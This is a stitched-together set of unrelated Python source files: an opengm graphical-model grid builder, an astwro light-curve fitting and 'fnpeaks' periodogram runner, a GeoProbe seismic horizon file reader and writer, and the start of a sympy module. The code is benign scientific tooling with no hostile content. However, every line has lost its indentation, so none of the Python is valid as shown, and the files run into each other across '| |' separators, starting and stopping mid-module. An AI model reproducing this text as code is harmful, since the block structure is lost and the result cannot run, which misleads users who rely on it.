for c[6] in xrange(shape[6]):
for c[5] in xrange(shape[5]):
for c[4] in xrange(shape[4]):
for c[3] in xrange(shape[3]):
for c[2] in xrange(shape[2]):
for c[1] in xrange(shape[1]):
for c[0] in xrange(shape[0]):
yield c
elif (dim==9):
for c[8] in xrange(shape[8]):
for c[7] in xrange(shape[7]):
for c[6] in xrange(shape[6]):
for c[5] in xrange(shape[5]):
for c[4] in xrange(shape[4]):
for c[3] in xrange(shape[3]):
for c[2] in xrange(shape[2]):
for c[1] in xrange(shape[1]):
for c[0] in xrange(shape[0]):
yield c
elif (dim==10):
for c[9] in xrange(shape[9]):
for c[8] in xrange(shape[8]):
for c[7] in xrange(shape[7]):
for c[6] in xrange(shape[6]):
for c[5] in xrange(shape[5]):
for c[4] in xrange(shape[4]):
for c[3] in xrange(shape[3]):
for c[2] in xrange(shape[2]):
for c[1] in xrange(shape[1]):
for c[0] in xrange(shape[0]):
yield c
else :
raise TypeError("shapeWalker is only implemented for len(shape)<=10 ")
class Adder:
def neutral(self):
return float(0.0)
class Multiplier:
def neutral(self):
return float(1.0)
def modelViewFunction(factor):
class _ModelViewFunction:
def __init__(self,factor):
self.factor=factor
def __call__(self,labeling):
return self.factor[labeling]
return PythonFunction( _ModelViewFunction(factor) ,factor.shape.__tuple__())
def gridVisNh4(shape, numpyOrder=True):
hFactors=(shape[0]-1)*shape[1];
vFactors=(shape[1]-1)*shape[0];
nFac = hFactors+vFactors;
vis = numpy.zeros(shape=[nFac,2],dtype=index_type)
secondOrderGridVisNew(shape[0], shape[1], numpyOrder, vis)
return vis
#Model generators
def grid2d2Order(unaries,regularizer,order='numpy',operator='adder'):
"""
returns a 2d-order model on a 2d grid (image).
The regularizer is the same for all 2.-order functions.
Keyword arguments:
unaries -- unaries as 3d numy array where the last dimension iterates over the labels
regularizer -- second order regularizer
order -- order how to compute a scalar index from (x,y) (default: 'numpy')
operator -- operator of the graphical model (default: 'adder')
Example : ::
>>> import opengm
>>> import numpy
>>> unaries=numpy.random.rand(10, 10,2)
>>> gridGm=opengm.grid2d2Order(unaries=unaries,regularizer=opengm.pottsFunction([2,2],0.0,0.4))
>>> int(gridGm.numberOfVariables)
100
"""
shape=unaries.shape
assert(len(shape)==3)
numLabels=shape[2]
numVar=shape[0]*shape[1]
numFactors=(shape[0]-1)*shape[1] + (shape[1]-1)*shape[0] +numVar
numberOfLabels=numpy.ones(numVar,dtype=numpy.uint64)*numLabels
gm=graphicalModel(numberOfLabels,operator=operator)
gm.reserveFunctions(numVar+1,'explicit')
gm.reserveFactors(numFactors)
# add unaries
unaries2d=unaries.reshape([numVar,numLabels])
#fids=
#vis=
gm.addFactors( gm.addFunctions(unaries2d),numpy.arange(0,numVar,dtype=numpy.uint64),finalize=False)
# add 2-order function
vis2Order=secondOrderGridVis(shape[0],shape[1],bool(order=='numpy'))
fid2Order=gm.addFunction(regularizer)
fids=FidVector()
fids.append(fid2Order)
gm.addFactors(fids,vis2Order,finalize=False)
gm.finalize()
return gm
def grid3d2Order(unaries,regularizer,order='numpy',operator='adder'):
"""
returns a 2d-order model on a 3d grid (volume).
The regularizer is the same for all 2.-order functions.
Keyword arguments:
unaries -- unaries as 4d numpy array where the last dimension iterates over the labels
regularizer -- second order regularizer
order -- order how to compute a scalar index from (x,y,z) (default: 'numpy')
operator -- operator of the graphical model (default: 'adder')
Example : ::
>>> import opengm
>>> import numpy
>>> unaries=numpy.random.rand(10, 10, 10, 2)
>>> gridGm=opengm.grid3d2Order(unaries=unaries,regularizer=opengm.pottsFunction([2,2],0.0,0.4))
>>> int(gridGm.numberOfVariables)
1000
"""
shape=unaries.shape
assert len(shape) == 4
numLabels=shape[-1]
numVar=shape[0]*shape[1]*shape[2]
numberOfLabels=numpy.ones(numVar,dtype=numpy.uint64)*numLabels
gm=graphicalModel(numberOfLabels,operator=operator)
# add unaries
unaries3d=unaries.reshape([numVar,numLabels])
gm.addFactors( gm.addFunctions(unaries3d),
numpy.arange(0,numVar,dtype=numpy.uint64),finalize=False)
# add 2-order function
vis2Order=secondOrderGridVis3D(shape[0], shape[1], shape[2],
bool(order=='numpy'))
fid2Order=gm.addFunction(regularizer)
fids=FidVector()
fids.append(fid2Order)
gm.addFactors(fids,vis2Order,finalize=False)
gm.finalize()
return gm
def pottsModel3d(unaries, regularizer, order='numpy', operator='adder'):
unaries = numpy.require(unaries, dtype=value_type).squeeze()
regularizer = numpy.require(regularizer, dtype=value_type).squeeze()
if operator == 'adder':
f = adder._pottsModel3d
else :
f = multiplier._pottsModel3d
print unaries.shape
print regularizer.shape
gm = f(unaries, regularizer, order == 'numpy')
return gm
def pottsModel3dMasked(unaries, regularizer, mask, operator='adder'):
unaries = numpy.require(unaries, dtype=value_type).squeeze()
regularizer = numpy.require(regularizer, dtype=value_type).squeeze()
if operator == 'adder':
f = adder._pottsModel3dMasked
else :
f = multiplier._pottsModel3dMasked
idx2vi = numpy.zeros(mask.size,dtype=numpy.uint32)
gm = f(unaries, regularizer, mask, idx2vi)
return gm
def makeMaskedState(mask, arg, labelIdx):
"""
maps gm result to 3d volume coords
mask : mask image
arg : result of gm inference
labelIdx : value that will be assigned to masked region
"""
imgArg = numpy.zeros(mask.shape, dtype=numpy.uint32)
_opengmcore._makeMaskedState(mask, arg, imgArg, labelIdx)
return imgArg
def getStartingPointMasked(imgArg, mask, maskIdx=1):
"""
maps 3d starting points to gm indices
"""
points = numpy.zeros(mask[mask==maskIdx].shape, dtype=numpy.uint32)
_opengmcore._getStartingPointMasked(mask, imgArg, points)
return points.astype(label_type)
# the following is to enable doctests of pure boost::python classes
# if there is a smarter way, let me know
_GmAdder = adder.GraphicalModel
_GmMultiplier = multiplier.GraphicalModel
_FactorAdder = adder.Factor
_FactorMultiplier = multiplier.Factor
_ExplicitFunction = ExplicitFunction
_SparseFunction = SparseFunction
_TruncatedAbsoluteDifferenceFunction = TruncatedAbsoluteDifferenceFunction
_TruncatedSquaredDifferenceFunction = TruncatedSquaredDifferenceFunction
_PottsFunction = PottsFunction
_PottsNFunction = PottsNFunction
_PottsGFunction = PottsGFunction
_PythonFunction = PythonFunction
_FactorSubset = FactorSubset
_extend_gm_classes()
_extend_factor_classes()
_extend_function_type_classes()
_extend_function_vector_classes()
if __name__ == "__main__":
import doctest
import opengm
doctest.testmod()
#raise RuntimeError(" error")
#doctest.run_docstring_examples(opengm.adder.GraphicalModel.addFactor, globals())
| |
# coding=utf-8
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# see https://wiki.python.org/moin/PortingToPy3k/BilingualQuickRef
from os.path import join
import numpy as np
from astropy.table import Table
from astropy.modeling import models, fitting
from astropy.stats import sigma_clipped_stats, sigma_clip
from astwro.exttools import Runner
from astwro.phot.lc_io import write_lc, write_lc_filters
class LCFitter(object):
"""
Abstract Light Curve Fitter
Base class for light curve fitters used by `FNpeaksResult.makefit`
Parameters
----------
clipping_sigma: float
Sigma clipping to this of light curve before fitting
"""
def __init__(self, clipping_sigma=None):
self.clipping_sigma = clipping_sigma
self.fit = None
def __call__(self, *args, **kwargs):
"""
Call underlying model
"""
return self.fit(*args, **kwargs)
def dofit(self, freq, hjd, lc, lc_e=None):
"""
Performs model fit to light curve
Dummy abstract method to be overridden
Parameters
----------
freq: float
Frequency found by FNpeaks, fixed model parameter.
hjd : array-like
N-element time axis
lc : array-like
N-element measurements on points on `hjd` time moments
lc_e : array-like
N-element optional errors of measurements `lc`
Returns
-------
Touple clipped_hjd, fitted_model
"""
raise NotImplementedError('Abstract LCFitter.fit method called')
return None, self
class SineFitter(LCFitter):
"""A sin(2pi*f + phi)"""
def __init__(self, clipping_sigma=None):
super(SineFitter, self).__init__(clipping_sigma)
self.fit = None
self.frequency = None
self.amplitude = None
self.phase = None
def dofit(self, freq, hjd, lc, lc_e=None):
fitter = fitting.FittingWithOutlierRemoval(fitting.LevMarLSQFitter(), sigma_clip, sigma=self.clipping_sigma)
model = models.Sine1D(frequency=freq)
model.frequency.fixed = True
clipped, fit = fitter(model, hjd, lc - sigma_clipped_stats(lc)[0])
self.fit = fit
self.frequency = fit.frequency
self.amplitude = fit.amplitude
self.phase = fit.phase
return clipped, self
class SineFitterC(LCFitter):
"""A sin(2pi*f + phi) + mag"""
def __init__(self, clipping_sigma=None):
super(SineFitterC, self).__init__(clipping_sigma)
self.fit = None
self.frequency = None
self.amplitude = None
self.phase = None
self.mag = None
def dofit(self, freq, hjd, lc, lc_e=None):
fitter = fitting.FittingWithOutlierRemoval(fitting.LevMarLSQFitter(), sigma_clip, sigma=self.clipping_sigma)
model = models.Sine1D(frequency=freq) + models.Const1D(0)
model.frequency_0.fixed = True
clipped, fit = fitter(model, hjd, lc)
self.fit = fit
self.frequency = fit.frequency_0
self.amplitude = fit.amplitude_0
self.phase = fit.phase_0
self.mag = fit.amplitude_1
return clipped, self
class SineHarmonicFitterC(LCFitter):
"""A SUM_i sin(2pi*f*i + phi) + mag"""
def __init__(self, clipping_sigma=None, minn=1, maxn=6):
super(SineHarmonicFitterC, self).__init__(clipping_sigma)
self.fit = None
self.frequency = None
self.amplitude = None
self.phase = None
self.mag = None
self.minn = minn
self.maxn = maxn
def dofit(self, freq, hjd, lc, lc_e=None):
inner_fitter = fitting.LevMarLSQFitter()
fitter = fitting.FittingWithOutlierRemoval(inner_fitter, sigma_clip, sigma=self.clipping_sigma)
ret_clipped = None
for n in range(self.minn, self.maxn+1):
model = models.Const1D(0)
for i in range(1, n+1): # add i harmonics to model
model_s = models.Sine1D(frequency=freq*i, amplitude=0)
model_s.frequency.fixed = True
model = model + model_s
clipped, fit = fitter(model, hjd, lc)
if ret_clipped is None:
ret_clipped = clipped # return first clipping not harmonics clipping
chi = np.ma.std(clipped - fit(hjd))
print(chi)
self.fit = fit
self.frequency = fit.frequency_1
self.amplitude = fit.amplitude_1
self.phase = fit.phase_1
self.mag = fit.amplitude_0
return ret_clipped, self
class Peak(object):
"""
Peak description.
Parameters
----------
freq : float
period : float
power : float
sn : float
Signal to noise of peak
"""
def __init__(self, freq, period, power, sn):
self.freq = freq
self.period = period
self.power = power
self.sn = sn
class FNpeaksResult(object):
"""
Results of fnpeak call.
Returned by `~astwro.timeseries.FNpeaks`.
Attributes
----------
power : `~numpy.ndarray`
Power of signal in frequencies, use `~astwro.timeseries.FNpeaks.freq` method for i-th frequency
peaks : list of `~astwro.timeseries.Peak`
List of most prominent peaks returned by fnpeaks (*.max file)
notes).
"""
def __init__(self):
self.power = None
self.peaks = None
self.lc = None
self.lc_e = None
self.hjd = None
self.freq_range = (0.0, 0.0)
self.freq_step = 0.0
self.fit = None
self.lc_clipped = None
@property
def frequencies(self):
return np.arange(self.freq_range[0], self.freq_range[1], self.freq_step)
@property
def periods(self):
return 1.0 / np.arange(self.freq_range[0], self.freq_range[1], self.freq_step)
@property
def lc_reduced(self):
if self.fit is None:
self.makefit()
return self.lc_clipped - self.fit(self.hjd)
def makefit(self, freq=None, peak=0, clipping_sigma=3.0, fitter_class=SineHarmonicFitterC, **kwargs):
if freq is None:
freq = self.peaks[peak]['freq']
fitter = fitter_class(clipping_sigma, **kwargs)
self.lc_clipped, self.fit = fitter.dofit(freq, self.hjd, self.lc,self.lc_e)
return self.fit
# def makefit(self, freq=None, peak=0, clipping_sigma=3.0):
# if freq is None:
# freq = self.peaks[peak]['freq']
# fitter = fitting.FittingWithOutlierRemoval(fitting.LevMarLSQFitter(), sigma_clip, sigma=clipping_sigma)
# model = models.Sine1D(frequency=freq)
# model.frequency.fixed = True
# self.lc_clipped, self.fit = fitter(model, self.hjd, self.lc - sigma_clipped_stats(self.lc)[0])
# return self.fit
class FNpeaks(Runner):
"""
`fnpeaks` runner
Object of this class maintains single process of `fnpeaks` and it's working directory.
Parameters
----------
hjd : `~numpy.ndarray`
Heliocentric julian days for observations (second dimension of lc)
lc : `~numpy.ndarray`
2D NxM array-like with light curves. N stars, M observations
lc_e : `~numpy.ndarray`, optional
Standart deviations of `lc`
filtermasks : dict, optional
Keys are filters, values are boolean masks for second dimension of `lc` with masks of filter
start_freq : float
Start frequency to scan (1/day)
end_freq : float
End frequency to scan (1/day)
step_freq : float
Frequency step
ids : array-like:
1D N element array with numerical ids of stars for filenames generation
dir : str, optional
Path of directory used for fnpeaks input output. If not provided temporary dir will be used
and deleted on destructor.
"""
def __init__(self, hjd, lc, lc_e=None, filtermasks=None,
start_freq=0.0001, end_freq=40.0001, step_freq=0.0001,
ids=None, dir=None):
super(FNpeaks, self).__init__(dir=dir)
self.hjd = hjd
if lc.ndim == 1:
self.lc = lc.reshape((1, lc.size))
else:
self.lc = lc
if lc_e is not None and lc_e.ndim == 1:
self.lc_e = lc_e.reshape((1, lc_e.size))
else:
self.lc_e = lc_e
self.filtermasks = filtermasks
self.start_freq = start_freq
self.end_freq = end_freq
self.step_freq = step_freq
self.start_freq = start_freq
self.ids = ids
self._update_executable('fnpeaks')
def __call__(self, star, filter=None, periodogram=False, error_max=None, sigmaclip=None):
"""
Runs fnpeaks for specified star(s)
Parameters
----------
star : long or array-like
Stars(s) to process, position index in `~astwro.timeseries.FNpeaks.lc`
filter : list of str
If `~astwro.timeseries.FNpeaks.filtermasks` specified, selects filters. None means: all filters.
periodogram : bool
Whether to generate power spectral density estimates
"""
# TODO reuse saved files
if isinstance(star, int):
star = [star]
lc = self.lc[star]
lc_e = None
if self.lc_e is not None:
lc_e = self.lc_e[star]
ids = None
if self.ids is not None:
ids = self.ids[star]
else:
ids = star
mask = np.ones_like(lc, dtype=bool)
if error_max is not None and lc_e is not None:
mask = lc_e < error_max
lc = np.ma.MaskedArray(lc)
lc.mask = lc.mask | ~(lc_e < error_max)
if sigmaclip is not None:
lc = sigma_clip(lc, sigma=sigmaclip)
if self.filtermasks is None:
write_lc(self.hjd, lc, lc_e, ids, 0.0,
prefix=join(self.dir.path, 'lc_'), suffix='.diff')
else:
if filter is None:
filter = [f for f in self.filtermasks]
write_lc_filters(self.filtermasks, filter, self.hjd, lc, lc_e, ids, 0.0,
prefix=join(self.dir.path, 'lc_'), suffix='.diff')
ret = []
for s in star:
r = None
if self.filtermasks is None:
r = self._runfnpeaks(s, None, periodogram)
else:
r = {}
for f in filter:
r[f] = self._runfnpeaks(s, f, periodogram)
ret.append(r)
if len(ret) == 1:
ret = ret[0]
return ret
def freq(self, i):
"""
Returns i-th frequency(ies)
"""
return self.start_freq + i * self.step_freq
def period(self, i):
"""
Returns i-th period(s)
"""
return 1.0 / self.freq(i)
def _runfnpeaks(self, star_pos, filter, periodogram):
if self.ids is not None:
star = np.array(self.ids)[star_pos]
else:
star = star_pos
if filter is None:
fname = 'lc_{:05d}'.format(star)
else:
fname = 'lc_{:05d}_{}'.format(star, filter)
if periodogram:
self.arguments = ['-f']
else:
self.arguments = []
self.arguments += [fname+'.diff']
self.arguments += ['{:f}'.format(x) for x in [self.start_freq, self.end_freq, self.step_freq]]
self.run(wait=True)
ret = FNpeaksResult()
with open(join(self.dir.path, fname)+'.max', 'r') as f:
lines = f.readlines()
peaks = Table(names=['no', 'freq', 'period', 'amplitude', 'sn'])
for i, l in enumerate(lines[9:]):
if len(l) > 2:
peaks.add_row([float(s) for s in l.split()])
ret.peaks = peaks
ret.freq_range = (self.start_freq, self.end_freq)
ret.freq_step = self.step_freq
ret.lc = self.lc [star_pos] #TODO cache lc[:,filter] in internal dict via @property _fmask_lc(f)
ret.lc_e = self.lc_e[star_pos] if self.lc_e is not None else None
ret.hjd = self.hjd
if filter is not None and self.filtermasks is not None:
ret.lc = ret.lc [self.filtermasks[filter]]
ret.lc_e = ret.lc_e[self.filtermasks[filter]] if ret.lc_e is not None else None
ret.hjd = ret.hjd [self.filtermasks[filter]]
if periodogram:
ret.power = np.fromfile(join(self.dir.path, fname)+'.trf', sep=' ')[1::2] # only freq column
return ret
| |
import numpy as np
import os
import six
#-- Imports from local files --------------------------------------
from .volume import volume
from .common import read_binary, write_binary
#-- Build dtype for points ----------------------------------------
_point_format = ('>f', '>f', '>f', '>f', '>B', '>B', '>B')
_point_names = ('x', 'y', 'z', 'conf', 'type', 'herid', 'tileSize')
_point_dtype = list(zip(_point_names, _point_format))
class horizon(object):
"""
Reads and writes geoprobe horizon files
horizon.x, horizon.y, and horizon.z are the x,y, and z coordinates
stored in the horizon file (in model coordinates, i.e. inline/crossline).
These are views into horizon.data, so any changes made to these will
update horizon.data and vice versa.
horizon.grid is a 2d numpy masked array of the z-values in the horizon
masked in regions where there aren't any z-values. The extent of the grid
is controlled by horizon.grid_extents (a tuple of xmin, xmax, ymin, ymax)
which is inferred from the underlying x,y data if it is not specified.
Useful attributes set at initialization:
data: A structured numpy array with the fields 'x', 'y', 'z',
'conf', 'type', 'herid', and 'tileSize'. This array
contains all the data stored in the horizon file.
surface: A view into horizon.data that contains only the points
in the file that make up a "filled" surface. (Usually points
interpolated between manual picks).
lines: A list of manual picks stored in the horizon file. Each item
in the list is a tuple of a) a 4-tuple of line information
(xdir, ydir, zdir, ID) and b) a view into horizon.data
containing the points in the line.
"""
def __init__(self, *args, **kwargs):
"""
Takes either a filename or a numpy array
If a single string is given as input, the string is assumed to be a
filename, and a new horizon object is constructed by reading the file
from disk.
Otherwise, a horizon object can be created from existing data, as
described below:
If one input argument is given, it is assumed to be a structured
numpy array and is used as the filled surface portion of the
horizon. The input array must be convertable into an array
with a dtype of horizon.POINT_DTYPE.
If two input arguments are given, the first is used as the filled
surface portion of the horizon file and the second a list of lines
in the same format as horizon.lines. The arrays must be convertable
into an array with dtype horizon.POINT_DTYPE
If three input arguments are given, they are assumed to be lists/arrays
of x, y, and z coordinates (respectively) of the points in the new
horizon.
Alternatively, you may specify these options using the following
keyword arguments: surface, lines, or x, y, and z.
For example, a horizon object can be initalized in the following ways:
h = geoprobe.horizon('/path/to/file')
h = geoprobe.horizon(data)
h = geoprobe.horizon(surface, lines)
h = geoprobe.horizon(x,y,z)
h = geoprobe.horizon(x=x, y=y, z=z)
h = geoprobe.horizon(lines=a_list_of_lines)
h = geoprobe.horizon(surface=surface_array)
h = geoprobe.horizon(surface=surface, lines=lines)
"""
# If __init__ is just passed a string, assume it's a filename
# and make a horizon object by reading from disk
if (len(args) == 1) and isinstance(args[0], six.string_types):
self._readHorizon(args[0])
# Otherwise, pass the args on to _make_horizon_from_data for
# parsing
else:
self._parse_new_horizon_input(*args, **kwargs)
# For gridding:
self.nodata = -9999
# Need to make dx, dy, and dz properties...
# How do we determine spacing without a volume?
# d = np.abs(np.diff(self.x)); np.mean(d[d!=0]) (ideally, mode)?
# Adding this constant so that the "correct" dtype is visible before a
# horizon object is initialized
POINT_DTYPE = _point_dtype
def _readHorizon(self, filename):
"""Reads a horizon from disk"""
self._file = HorizonFile(filename, 'rb')
self._header = self._file.readHeader()
if self._header == b"#GeoProbe Horizon V2.0 ascii\n":
raise TypeError('Ascii horizons not currently supported')
elif self._header != b"#GeoProbe Horizon V2.0 binary\n":
raise TypeError('This does not appear to be a valid geoprobe'\
' horizon')
self.data = self._file.readAll()
# Surface and line attributes
self.surface = self._file.surface
self.lines = self._file.lines
# Oddly enough, Geoprobe (the actual Landmark application) seems to
# do this a lot...
# Raise the error here to avoid problems down the road!
if self.data.size == 0:
raise ValueError('This file does not contain any points!')
def _parse_new_horizon_input(self, *args, **kwargs):
"""Parse input when given something other than a filename"""
#-- Parse Arguments ---------------------------------------------------
if len(args) == 1:
# Assume argument is data (numpy array with dtype of _point_dtype)
self.data = self._ensure_correct_dtype(args[0])
self.surface = self.data
elif len(args) == 2:
# Assume arguments are surface + lines
self._init_from_surface_lines(self, surface=args[0], lines=args[1])
elif len(args) == 3:
# Assume arguments are x, y, and z arrays
self._init_from_xyz(*args)
#-- Parse keyword arguments -------------------------------------------
elif ('x' in kwargs) and ('y' in kwargs) and ('z' in kwargs):
self._init_from_xyz(kwargs['x'], kwargs['y'], kwargs['z'])
elif ('surface' in kwargs) or ('lines' in kwargs):
surface = kwargs.pop('surface', None)
lines = kwargs.pop('lines', None)
self._init_from_surface_lines(surface, lines)
else:
raise ValueError('Invalid arguments. You must specify one of:'\
' x,y,&z, surface, or lines')
def _ensure_correct_dtype(self, data):
"""Converts data into the proper dtype for points and raises a useful
error message if it fails"""
try:
data = np.asarray(data, dtype=self.POINT_DTYPE)
except TypeError:
raise TypeError('The input data cannot be converted into an array'
' with dtype=%s' % repr(self.POINT_DTYPE))
return data
def _init_from_xyz(self, x, y, z):
"""Make a new horizon object from x, y, and z arrays"""
x,y,z = [np.asarray(item, dtype=np.float32) for item in [x,y,z]]
if x.size == y.size == z.size:
self.data = np.zeros(x.size, dtype=self.POINT_DTYPE)
self.x = x
self.y = y
self.z = z
self.surface = self.data
else:
raise ValueError('x, y, and z arrays must be the same length')
def _init_from_surface_lines(self, surface=None, lines=None):
"""
Make a new horizon object from either a surface array or a list of
line arrays
"""
if surface is not None:
surface = self._ensure_correct_dtype(surface)
# Calculate total number of points
numpoints = surface.size if surface else 0
if lines is not None:
for info, line in lines:
numpoints += line.size
# Make self.data and make self.lines & self.surface views into self.data
self.data = np.zeros(numpoints, dtype=self.POINT_DTYPE)
array_list = []
if surface is not None:
array_list.append((None, surface))
if lines is not None:
array_list.extend(lines)
i = 0
self.lines = []
for info, item in array_list:
self.data[i:i+item.size] = item
if (surface is not None) and (i == 0):
self.surface = self.data[i:i+item.size]
else:
self.lines.append((info, self.data[i:i+item.size]))
i += item.size
def write(self, filename):
"""
Write the horizon to a new file ("filename")
"""
self._file = HorizonFile(filename, 'wb')
# If self.lines isn't set, default to []
try:
self._file.lines = self.lines
except AttributeError:
self._file.lines = []
# If self.surface isn't set, default to an empty numpy array
try:
self._file.surface = self.surface
except AttributeError:
self._file.surface = np.zeros(0, dtype=self.POINT_DTYPE)
self._file.writeAll()
@property
def numpoints(self):
"""The total number of points stored in the horizon
(equivalent to horizon.data.size)"""
return self.data.size
#-- xmin, xmax, etc properties --------------------------------------------
xmin = property(lambda self: self.x.min(), doc='Mininum X-coordinate')
ymin = property(lambda self: self.y.min(), doc='Mininum Y-coordinate')
zmin = property(lambda self: self.z.min(), doc='Mininum Z-coordinate')
xmax = property(lambda self: self.x.max(), doc='Maximum X-coordinate')
ymax = property(lambda self: self.y.max(), doc='Maximum Y-coordinate')
zmax = property(lambda self: self.z.max(), doc='Maximum Z-coordinate')
#--------------------------------------------------------------------------
#-- x,y,z properties ------------------------------------------------------
def _get_coord(self, name):
return self.data[name]
def _set_coord(self, name, value):
self.data[name] = value
x = property(lambda self: self._get_coord('x'),
lambda self, value: self._set_coord('x', value),
doc='X-coordinates of all points stored in the horizon')
y = property(lambda self: self._get_coord('y'),
lambda self, value: self._set_coord('y', value),
doc='Y-coordinates of all points stored in the horizon')
z = property(lambda self: self._get_coord('z'),
lambda self, value: self._set_coord('z', value),
doc='Z-coordinates of all points stored in the horizon')
#--------------------------------------------------------------------------
#-- Grid Extents Property -------------------------------------------------
def _get_grid_extents(self):
"""A tuple of (xmin, ymin, xmax, ymax) indicating the extent (in model
coordinates) of self.grid. This is inferred from the extents of the
horizon's data unless it is manually set, in which case the self.grid
will cover the indicated area."""
try:
return self._grid_extents
except AttributeError:
self._grid_extents = (self.xmin, self.xmax, self.ymin, self.ymax)
return self._grid_extents
def _set_grid_extents(self, value):
xmin, xmax, ymin, ymax = value
if (xmin > xmax) or (ymin > ymax):
raise ValueError('Grid extents must be (xmin, xmax, ymin, ymax)')
self._grid_extents = value
# Delete the cache of self.grid, as it will now be invalid.
try:
del self._grid
except AttributeError:
pass
grid_extents = property(_get_grid_extents, _set_grid_extents)
#--------------------------------------------------------------------------
#-- Grid Property ---------------------------------------------------------
def _get_grid(self):
"""An nx by ny numpy array (dtype=float32) of the z values contained
in the horizon file"""
try:
return self._grid
except AttributeError:
x, y, z = self.x, self.y, self.z
xmin, xmax, ymin, ymax = self.grid_extents
ny, nx = int(ymax - ymin + 1), int(xmax - xmin + 1)
grid = self.nodata * np.ones((ny, nx), dtype=np.float32)
I = np.array(x - xmin, dtype=np.int)
J = np.array(y - ymin, dtype=np.int)
inside_extents = (I >= 0) & (I < nx) & (J >= 0) & (J < ny)
I = I[inside_extents]
J = J[inside_extents]
grid[J,I] = z[inside_extents]
grid = np.ma.masked_values(grid, self.nodata, copy=False)
grid.fill_value = self.nodata
self._grid = grid
return self._grid
def _set_grid(self, value):
self._grid = np.ma.asarray(value)
grid = property(_get_grid, _set_grid)
#--------------------------------------------------------------------------
@property
def name(self):
try:
_file = self._file
except AttributeError:
return ''
basedir, basename = os.path.split(_file.name)
if basename.endswith('.hzn'):
return basename[:-4]
else:
return basename
def strikeDip(self, vol=None, velocity=None):
"""
Returns a strike and dip of the horizon following the Right-hand-rule.
Input:
vol (optional): A geoprobe volume object
If specified, the x, y, and z units will be converted
to world units based on the volume's header.
velocity (optional): Velocity in meters/second
If specified, the z units will be converted from time
into depth using the velocity given. Assumes the z
units are milliseconds!!
Output:
strike, dip
"""
# Delayed import to avoid circular dependency
from .utilities import points2strikeDip
return points2strikeDip(self.x, self.y, self.z,
vol=vol, velocity=velocity)
def toGeotiff(self, filename, vol=None, nodata=None, zscale=None):
"""
Create and write a geotiff file from the geoprobe horizon object.
The Z values in the output tiff will be stored as 32bit floats.
Input:
filename: Output filename
vol (optional): A geoprobe volume object or path to a geoprobe
volume file. If vol is specified, the geotiff will be
georeferenced based on the data in the volume header (and will
therefore be in same projection as the volume's world
coordinates). Otherwise the geotiff is created using the model
coordinates stored in the geoprobe horizon file.
nodata (default=self.nodata (-9999)): Value to use for NoData.
zscale (optional): Scaling factor to use for the Z-values. If vol
is specified, and vol.dz is negative, this defaults to -1.
Otherwise this defaults to 1.
"""
# Delayed import to avoid circular dependency
from .utilities import array2geotiff
if vol is not None:
if type(vol) == type('string'):
vol = volume(vol)
Xoffset, Yoffset = vol.model2world(self.xmin, self.ymin)
transform = vol
else:
Xoffset, Yoffset = 0,0
transform = None
if nodata==None:
nodata = self.nodata
# Zscale is not 1 by default, as I want the default to be set by vol.dz
# and any specified value to override the default
if zscale is None:
if vol is None: zscale = 1
elif vol.dz > 0: zscale = 1
elif vol.dz < 0: zscale = -1
data = self.grid
data.fill_value = nodata
data *= zscale
data = data.filled()
array2geotiff(data, filename, nodata=nodata,
extents=(Xoffset, Yoffset), transform=transform)
#-- This is currently very sloppy code... Need to clean up and document
class HorizonFile(object):
"""Basic geoprobe horizon binary file format reader
Disk layout of Geoprobe horizons
Reverse engineered by JDK, Feb. 2009
Format descrip:
1 ascii line w/ version (terminated with newline)
There are two "sections" in every file.
The first section contains x,y,z points making a "filled" surface
(This is basically a sparse matrix)
The second section contains lines (manual picks)
Both section types have a 4 byte header (seems to be >I?)
The first section (surface) always (?) has a section header
value of '\x00\x00\x00\x13' (unpacks to 19)
The section section (manual picks) contains the number of
manually picked lines in the file (packed as >I).
Subsections
The first section only has one subsection, a "filled" surface
Surface header: (>I) Number of points in the surface
The second section contains "numlines" subsections containing
manual picks (lines):
Line header: (>4f) xdir,ydir,zdir,ID
Point Format in all sections: (>4f3B)
x,y,z,confidence,type,heridity,tileSize
"""
_sectionHdrFmt = '>I'
_surfaceHdrFmt = '>I'
_lineHdrFmt = '>4f'
def __init__(self, *args, **kwargs):
"""Accepts the same argument set as a standard python file object"""
# Initalize the file object as normal
self._file = open(*args, **kwargs)
def readHeader(self):
self._file.seek(0)
return self._file.readline()
def readPoints(self):
numPoints = read_binary(self._file, self._surfaceHdrFmt)
points = np.fromfile(self._file, count=numPoints, dtype=_point_dtype)
return points
def readSectionHeader(self):
return read_binary(self._file, self._sectionHdrFmt)
def readLineHeader(self):
# TODO: Change this to a numpy array
xdir,ydir,zdir,ID = read_binary(self._file, self._lineHdrFmt)
return xdir, ydir, zdir, ID
def readAll(self):
"""
Reads in the entire horizon file and returns a numpy array with the
fields ('x', 'y', 'z', 'conf', 'type', 'herid', 'tileSize') for each
point in the horizon.
"""
# Note: The total number of points in the file is not directly stored
# on disk. Therefore, we must read through the entire file, store
# each section's points in a list, and then create a contigious array
# from them. Using numpy.append is much simpler, but quite slow.
# Jump to start of file, past header
self.readHeader()
# Read points section
self.readSectionHeader() # Should always return 19
surface = self.readPoints()
temp_points = [surface]
# Read lines section
line_info = [None]
self.numlines = self.readSectionHeader()
for i in six.moves.range(self.numlines):
line_info.append(self.readLineHeader())
currentPoints = self.readPoints()
temp_points.append(currentPoints)
# Create a single numpy array from the list of arrays (temp_points)
numpoints = sum(map(np.size, temp_points))
points = np.zeros(numpoints, dtype=_point_dtype)
self.lines = []
i = 0
for info, item in zip(line_info, temp_points):
points[i : i + item.size] = item
# self.surface is a view into the first part of the points array
if i == 0:
self.surface = points[i:i+item.size]
# self.lines is a list of tuples, the first item is a tuple of
# (xdir,ydir,zdir,ID) where <xdir,ydir,zdir> form a vector in
# the direction of the line. The second item is a view into the
# points array containg the relevant x,y,z,etc points.
else:
self.lines.append((info, points[i:i+item.size]))
i += item.size
return points
def writeHeader(self):
header = "#GeoProbe Horizon V2.0 binary\n"
self._file.seek(0)
self._file.write(header)
def writePoints(self, points):
numPoints = points.size
write_binary(self._file, self._surfaceHdrFmt, numPoints)
points.tofile(self._file)
def writeLineHeader(self, line_hdr):
write_binary(self._file, self._lineHdrFmt, line_hdr)
def writeSectionHeader(self, sec_hdr):
write_binary(self._file, self._sectionHdrFmt, sec_hdr)
def writeAll(self):
self.writeHeader()
self.writeSectionHeader(19)
self.writePoints(self.surface)
self.writeSectionHeader(len(self.lines))
for (info, line) in self.lines:
self.writeLineHeader(info)
self.writePoints(line)
| |
from sympy.core.basic import Basic, S
from sympy.core.function import Function, diff
from sympy.core.numbers import Number
from sympy.core.relational import Relational
from sympy.core.sympify import sympify
from sympy.utilities.decorator import deprecated
class ExprCondPair(Basic):
